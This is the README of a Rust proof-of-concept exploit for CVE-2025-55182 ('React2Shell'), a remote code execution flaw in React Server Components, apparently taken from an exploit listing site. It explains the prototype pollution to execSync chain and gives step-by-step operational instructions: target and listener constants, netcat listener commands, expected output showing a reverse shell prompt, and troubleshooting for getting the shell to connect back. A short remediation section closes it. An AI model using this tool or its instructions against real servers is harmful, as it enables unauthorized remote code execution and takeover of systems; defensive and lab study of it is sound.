Share
## https://sploitus.com/exploit?id=4EB42032-8EFB-5A8B-8102-9BF59278396E
# React2Shell (CVE-2025-55182) PoC

A Proof-of-Concept exploit for **CVE-2025-55182**, also known as **React2Shell** - a critical remote code execution vulnerability in React Server Components.

> โš ๏ธ **EDUCATIONAL USE ONLY**: This tool is for authorized security testing, and learning purposes only. Unauthorized access to computer systems is illegal.


##CVE-2025-55182 is a **critical severity (CVSS 10.0)** server-side prototype pollution vulnerability affecting React Server Components. The vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable servers by sending a single crafted HTTP request.

### Affected Software

- **React** versions 19.x
- **Next.js** versions 15.x and 16.x (with App Router)
- **React Router** and **Waku** frameworks
- Applications using Server Components in default configurations

### Timeline

- **December 3, 2025**: Public disclosure
- **Within hours**: Active exploitation by state-sponsored threat actors
- **Added to CISA KEV catalog** due to widespread exploitation

## How It Works

The exploit leverages **prototype pollution** in React's server-side deserialization logic:

1. **Prototype Pollution**: Injects malicious properties into JavaScript's `__proto__` chain
2. **Code Execution**: Uses `process.mainModule.require('child_process').execSync()` to run commands
3. **Output Exfiltration**: Returns command output as base64-encoded data in HTTP redirect responses

### Technical Flow

```
Attacker โ†’ Malicious POST Request โ†’ React Server Components
         โ†“
    Prototype pollution via __proto__
         โ†“
    child_process.execSync('command')
         โ†“
    Base64 output in NEXT_REDIRECT error
         โ†“
    Attacker โ† Command output / Reverse shell
```

## Features

- โœ… **Clean, educational code** with extensive comments
- โœ… **BSD/macOS compatible** reverse shell (uses mkfifo, not -e flag)
- โœ… **Easy configuration** via constants at top of file
- โœ… **Proxy support** for traffic inspection (Burp Suite, etc.)
- โœ… **Response parsing** to show command output
- โœ… **Beginner friendly** structure and documentation

## Prerequisites

Before using this tool, you need:

### 1. Rust Toolchain

```bash
# Install Rust (if not already installed)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```

### 2. Netcat Listener

To receive the reverse shell:

```bash
# Start a listener on your machine
nc -lvnp 4444
```

### 3. A Vulnerable Target

You need a test environment with:
- Next.js 15.x or 16.x with App Router enabled
- React Server Components enabled
- Network connectivity between target and your listener IP


# Build the project
cargo build --release
```

## Configuration

Edit `src/main.rs` and modify these constants:

```rust
/// Target server URL (the vulnerable Next.js app)
const TARGET_URL: &str = "http://TARGET_HOST:TARGET_PORT";

/// Your IP address (where reverse shell connects back)
const LISTENER_IP: &str = "YOUR_IP_HERE";

/// Port for your netcat listener
const LISTENER_PORT: &str = "4444";

/// Optional proxy for traffic inspection
const PROXY_URL: Option = Some("http://127.0.0.1:8080");
```

### Example Configuration

```rust
const TARGET_URL: &str = "http://vulnerable-app.local:3000";
const LISTENER_IP: &str = "192.168.1.100";
const LISTENER_PORT: &str = "4444";
const PROXY_URL: Option = None;  // Disable proxy
```

## Usage

### Step 1: Start Your Listener

On your attack machine:

```bash
nc -lvnp 4444
```

### Step 2: Run the Exploit

```bash
cargo run --release
```

### Expected Output

```
[*] CVE-2025-55182 (React2Shell) Exploit
[*] Target: http://vulnerable-app.local:3000
[*] Listener: 192.168.1.100:4444

[*] Sending exploit payload...
[+] Response received

[*] Command Output:
(any error messages or output)

[+] Reverse shell may have connected!
[+] Check your listener at 192.168.1.100:4444
```

### Step 3: Check Your Listener

If successful, you'll see a connection in your netcat listener:

```bash
Connection from 192.168.1.50:54321
bash-5.1$
```

## Troubleshooting

### "nc: invalid option -- 'e'"

This means the target uses BSD netcat. The code already handles this with the mkfifo method.

### "Connection refused" or timeout

- Ensure your listener is running: `nc -lvnp 4444`
- Check firewall rules on your machine
- Verify the target can reach your LISTENER_IP
- Confirm network connectivity between systems

### "No redirect found in response"

- Target may not be vulnerable
- Check if React Server Components are enabled
- Verify Next.js version (needs 15.x or 16.x)
- Try inspecting traffic with Burp Suite (enable PROXY_URL)

### Command works but reverse shell doesn't connect

- Network connectivity issues between target and listener
- Firewall blocking outbound connections
- Try testing with simple command first: change `get_reverse_shell_command()` to return `"id"` or `"whoami"`

## Understanding the Code

### Main Components

1. **Configuration** (lines 11-26): Easy-to-modify settings
2. **Payload Builder** (lines 38-43): Creates the prototype pollution payload
3. **Reverse Shell** (lines 49-54): Generates BSD-compatible shell command
4. **Main Exploit** (lines 60-129): Sends request and parses response

### Key Functions

```rust
// Creates the malicious JSON payload
fn build_exploit_payload(command: &str) -> String

// Generates mkfifo-based reverse shell (BSD compatible)
fn get_reverse_shell_command(ip: &str, port: &str) -> String

// Main execution flow
fn main() -> Result>
```

## Setting Up a Test Environment

For educational purposes, you can create a vulnerable test lab:

```bash
# Create a Next.js 15.x app
npx create-next-app@15 vulnerable-app
cd vulnerable-app

# Start the development server
npm run dev
```

**Note**: Always patch production systems! This is for isolated testing only.

## Remediation

If you manage React/Next.js applications:

1. **Update immediately** to patched versions:
   - React: Update to latest secure version
   - Next.js: Update to patched 15.x/16.x releases

2. **Check for exploitation**:
   - Review logs for unusual POST requests with "Next-Action" headers
   - Look for execSync/child_process usage in logs
   - Check for unauthorized file creation (/tmp/f, etc.)

3. **Network segmentation**:
   - Limit outbound connections from web servers
   - Monitor for unusual reverse shell traffic

## References

- [Official React Security Advisory](https://react.dev/blog/2025/12/03/react-server-components-security)
- [Datadog Security Labs - CVE-2025-55182](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [React2Shell.com](https://react2shell.com/)
- [Huntress - PeerBlight Analysis](https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell)
- [AWS - China-nexus Threat Groups](https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/)